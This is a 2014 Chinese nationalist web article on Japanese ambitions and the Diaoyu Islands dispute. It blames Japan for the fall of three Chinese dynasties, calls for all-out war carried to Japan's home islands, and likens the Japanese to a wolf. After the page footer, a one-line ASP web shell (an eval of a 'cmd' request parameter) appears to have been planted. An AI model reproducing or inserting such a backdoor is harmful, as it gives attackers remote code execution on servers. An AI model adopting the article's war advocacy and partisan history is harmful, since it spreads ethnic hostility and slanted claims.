保钓展望

日本野心竟然如此之大,中国要吃大亏

时间:2014-10-14 23:01:16  作者:陆战队少校-彭庭华  来源:  查看:236  评论:2
内容摘要:一读历史,我感觉非常惊心,日本近代对中国国运影响之巨大,恐怕远超许多人的想像,明朝、清朝、民国的灭亡,都与芳邻日本有着巨大的关系。  日本的野心是什么?大陆的土地,日本人一直以来都在渴望拥有大陆的土地。从此摆脱岛国发展的局限性。  明朝之时,万历朝鲜之役是四百年前发生在朝鲜半岛的...

一读历史,我感觉非常惊心,日本近代对中国国运影响之巨大,恐怕远超许多人的想像,明朝、清朝、民国的灭亡,都与芳邻日本有着巨大的关系。

  日本的野心是什么?大陆的土地,日本人一直以来都在渴望拥有大陆的土地。从此摆脱岛国发展的局限性。
  明朝之时,万历朝鲜之役是四百年前发生在朝鲜半岛的一场国际战争。日本史书把万历朝鲜之役分为两次战争,分别叫作文禄之役和庆长之役。朝鲜史书则称之为壬辰卫国战争。


  整个战争从万历二十年(1592年)开始至万历二十六年(1598年)结束,历时七年。这场战争,明朝“几举海内之全力”,前后用兵数十万,费银近八百万两,历经战与和的反复,最终异常艰苦的赢得了这场战争的胜利。

 

但由于此役,明朝一方在二十年内再无力进剿后金力量,使得女真部落日益强大,最后对明朝形成了致命的威胁。明之衰落至灭亡,日本所赐。

  清朝灭亡,实日本所赐,甲午战争清政府战败,中日双方签订《马关条约》,中国遭受到了有史以来最严重的宰割。即使我们不再赘述,国人对这一战争失败的恶果也会记忆犹新。甲午战争的失败对整个中国社会震动之大,影响之深,是前所未有的。


  首先海防尽,至使几年后,八国联军入侵可长驱直入,其次民心尽失,丧权辱国的《马关条约》签订,日本获得了清政府割让的辽东半岛、台湾和澎湖列岛,还有大笔战争赔款。清朝国库空虚,政局动荡,才有了后来的戊戌变法、辛亥革命,直到民国替代了清王朝。
  民国大陆政权的灭亡,其实始于一九三一年的九一八事变,日本入侵,造成民国巨大的人员与物资损失触目惊心,人员上,日军不仅在战场上给中国抗战官兵造成巨大的人员伤亡,也使无数无辜的中国平民成为冤魂。
  北起黑龙江,南至海南岛,东起海滨,西到重庆,日军铁蹄所至,生灵涂炭;屠刀所向,尸骨成山。从1937年到1945年的8年间,日军在中国制造了数万起杀害中国平民的血案,其中较大规模的杀人血案不下4000起,遇难的中国同胞达数千万人。


  战争期间,日军所到之处,疯狂地掠夺公私财富,破坏文化遗产,开采矿藏森林资源,发行伪钞,焚毁炸毁军民用设施,中华民族的物质精华,几被侵略者洗劫一空。

  日本侵华战争给中国社会带来了巨大灾难。它严重破坏了中国国家安全、主权独立和领土完整,给中国造成巨大的物质、文化财产损失,对中国社会发展与进步产生了严重滞碍作用。延缓了中国社会现代化进程达50年之久。

 

  对日本的野心如果再认识不足,中国恐还要吃大亏!

 

 钓鱼岛问题日本近期为何故意把它炒热?我觉得这更多像是一种试探,如果中日为钓鱼岛而开战,我们必须清醒的认识到,日本人的战场绝不会仅仅只是在钓鱼岛,日本的野心也决不会仅岂止于夺取钓鱼岛,日本人必会有更大的领土野心。


  日本人必会寻找机会,设下精心布置的圈套,一举摧毁中国的海空军力量,中日如果发生再小的战争,中国都要警提,或许这只是更大规模偷袭前的序曲。


  日本人在钓鱼岛如果蓄意在钓鱼岛挑起小规模战争,美国未必能够有效的压制,反而有可能被日本拖下水。
  中国与日本在钓鱼岛发生小规模的军事摩擦后,中国海军出入宫古海峡的例常训练的海军就要小心了,因为那地方日本人设伏非常理想,中国的主力舰尽量不要去那地段,中国空军要多配空中加油机,以防不测。

  从长期的角度来说,不是中日钓鱼岛难免一战,是而是中日必有一大战、一死战,必将用一大战彻底解决日本人的成为大陆国家的梦想,日本人一直以来都在梦想拥有大陆的土地。摆脱岛国发展的局限性。


  为确保东亚及西太平洋永久安宁。我们中国也必须制定长远的海洋战略,不断丰富海战的战术,视日本为中国的重大海权威胁,做好与日本开战的准备,不要对一条狼抱太多的幻想与期望,甲午海战的坚决悲剧不能重演,否则我们的国家与民族将再陷万劫不复的悲惨境地,我们与日本在东亚的竞争是你死我活的,从几百年来中日发展史得到了很真实的验证。

  中日一旦为钓鱼岛开战,就绝不应该只是钓鱼岛的局部的有限战争!而应该是中日之间全面的战争,战场应该扩大到日本本土!直到日本无条件投降,否则战争绝不终止,要动员中国所有力量,不惜一切代价,孤注一掷,背水一战!那怕鱼死网破,也在所不惜。


  收回琉球群岛及海域才是我们的战略目标,让日本人都见鬼去吧!

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):